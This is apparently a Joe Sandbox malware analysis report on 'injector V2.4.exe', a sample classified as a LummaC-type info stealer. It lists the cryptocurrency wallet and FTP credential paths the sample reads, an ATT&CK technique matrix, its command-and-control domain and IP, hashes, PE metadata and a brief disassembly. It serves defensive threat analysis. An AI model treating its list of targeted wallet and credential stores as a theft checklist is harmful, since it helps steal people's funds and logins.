          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 6564, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 6564, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          211
          Process Injection
          11
          Virtualization/Sandbox Evasion
          2
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Screen Capture
          21
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          211
          Process Injection
          LSASS Memory141
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager11
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares31
          Data from Local System
          113
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object Model2
          Clipboard Data
          Protocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets11
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials33
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          injector V2.4.exe42%ReversingLabsWin32.Trojan.Generic
          injector V2.4.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://property-imper.sbs/apie0%Avira URL Cloudsafe
          https://property-imper.sbs/m0%Avira URL Cloudsafe
          https://property-imper.sbs/apiW0%Avira URL Cloudsafe
          http://crl.microx0%Avira URL Cloudsafe
          https://property-imper.sbs/apisk0%Avira URL Cloudsafe
          https://property-imper.sbs/api$I0%Avira URL Cloudsafe
          https://property-imper.sbs/apiII80%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          property-imper.sbs
          104.21.33.116
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://property-imper.sbs/apifalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabinjector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://property-imper.sbs/apieinjector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoinjector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiinjector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://property-imper.sbs/apiWinjector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ecosia.org/newtab/injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctainjector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://property-imper.sbs/injector V2.4.exe, 00000004.00000003.2241245492.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2178099039.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134375818.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2202521642.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295771988.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2176641373.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2176971631.00000000052C3000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2273721386.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2273721386.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2223528130.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2199575933.00000000052C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://property-imper.sbs/minjector V2.4.exe, 00000004.00000002.2295771988.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brinjector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ac.ecosia.org/autocomplete?q=injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpginjector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpginjector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchinjector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://property-imper.sbs/api$Iinjector V2.4.exe, 00000004.00000003.2176493627.0000000005352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refinjector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://property-imper.sbs/apiskinjector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://property-imper.sbs/apiII8injector V2.4.exe, 00000004.00000003.2176493627.0000000005352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://support.mozilla.org/products/firefoxgro.allinjector V2.4.exe, 00000004.00000003.2178125921.00000000055DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.microxinjector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294509067.0000000002BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.33.116
                                                              property-imper.sbsUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1561470
                                                              Start date and time:2024-11-23 14:10:14 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 27s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:7
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:injector V2.4.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@6/0@1/1
                                                              EGA Information:
                                                              • Successful, ratio: 66.7%
                                                              HCA Information:
                                                              • Successful, ratio: 89%
                                                              • Number of executed functions: 40
                                                              • Number of non-executed functions: 113
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target injector V2.4.exe, PID 5268 because there are no executed function
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: injector V2.4.exe
                                                              TimeTypeDescription
                                                              08:11:11API Interceptor8x Sleep call for process: injector V2.4.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.21.33.116file.exeGet hashmaliciousLummaC StealerBrowse
                                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  property-imper.sbsloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                  • 172.66.0.235
                                                                                  SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.88.250
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.67.179
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.20.178
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 172.67.162.84
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.162.84
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                  • 104.21.33.116
                                                                                  SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.33.116
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.33.116
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.33.116
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.33.116
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.724737400091526
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:injector V2.4.exe
                                                                                  File size:491'520 bytes
                                                                                  MD5:c1b5cae419a07b5bfeb4e958510f8637
                                                                                  SHA1:80c99f320d7b74fb100b51cd98a2ff232e286e63
                                                                                  SHA256:608864a20a91e6fcacefa06046a522a66dbfe45f3f94adfc32ed89ffcae29907
                                                                                  SHA512:eba55a7ee08a6be1cda57a97329d97fdb0450f1db9a13a5b88263d21497eeb5c844a5000f46f20de13f82fe92e17e3339031b3806832c0982ee5a30f83255a9b
                                                                                  SSDEEP:12288:iJB+nneDgkXFEIapcLRDW+vHfQ1n21GwriB4jP/9h:GAoR25pclDWMHQ21IWj/
                                                                                  TLSH:BBA4E16A76A3E5F3E6A3083441E49BB20A6E7E700F2495FF43601F692F366D18131E57
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x415870
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                                  Instruction
                                                                                  call 00007FA1ACED4B4Ah
                                                                                  jmp 00007FA1ACED49ADh
                                                                                  mov ecx, dword ptr [0042B5F0h]
                                                                                  push esi
                                                                                  push edi
                                                                                  mov edi, BB40E64Eh
                                                                                  mov esi, FFFF0000h
                                                                                  cmp ecx, edi
                                                                                  je 00007FA1ACED4B46h
                                                                                  test esi, ecx
                                                                                  jne 00007FA1ACED4B68h
                                                                                  call 00007FA1ACED4B71h
                                                                                  mov ecx, eax
                                                                                  cmp ecx, edi
                                                                                  jne 00007FA1ACED4B49h
                                                                                  mov ecx, BB40E64Fh
                                                                                  jmp 00007FA1ACED4B50h
                                                                                  test esi, ecx
                                                                                  jne 00007FA1ACED4B4Ch
                                                                                  or eax, 00004711h
                                                                                  shl eax, 10h
                                                                                  or ecx, eax
                                                                                  mov dword ptr [0042B5F0h], ecx
                                                                                  not ecx
                                                                                  pop edi
                                                                                  mov dword ptr [0042B5ECh], ecx
                                                                                  pop esi
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 14h
                                                                                  and dword ptr [ebp-0Ch], 00000000h
                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                  and dword ptr [ebp-08h], 00000000h
                                                                                  push eax
                                                                                  call dword ptr [0042946Ch]
                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                                  mov dword ptr [ebp-04h], eax
                                                                                  call dword ptr [00429430h]
                                                                                  xor dword ptr [ebp-04h], eax
                                                                                  call dword ptr [0042942Ch]
                                                                                  xor dword ptr [ebp-04h], eax
                                                                                  lea eax, dword ptr [ebp-14h]
                                                                                  push eax
                                                                                  call dword ptr [004294A8h]
                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                  lea ecx, dword ptr [ebp-04h]
                                                                                  xor eax, dword ptr [ebp-14h]
                                                                                  xor eax, dword ptr [ebp-04h]
                                                                                  xor eax, ecx
                                                                                  leave
                                                                                  ret
                                                                                  mov eax, 00004000h
                                                                                  ret
                                                                                  push 0042C970h
                                                                                  call dword ptr [00429488h]
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov al, 01h
                                                                                  ret
                                                                                  push 00030000h
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  .coS0x310000x4c8000x4c800b3054e5e1020a2caf09f7f8b7770c7ccFalse1.0003382863562091data7.9993842690073835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  DLLImport
